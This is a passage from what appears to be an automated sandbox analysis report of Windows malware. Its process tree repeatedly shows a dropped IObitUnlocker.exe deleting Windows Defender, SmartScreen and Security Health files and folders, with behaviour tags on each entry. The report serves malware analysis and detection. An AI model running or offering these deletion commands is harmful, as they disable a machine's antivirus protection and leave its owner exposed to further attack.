indows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4868
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4988
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1340
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2420
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1916
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4188
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4460
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2372
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2700
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1220
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:3448
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 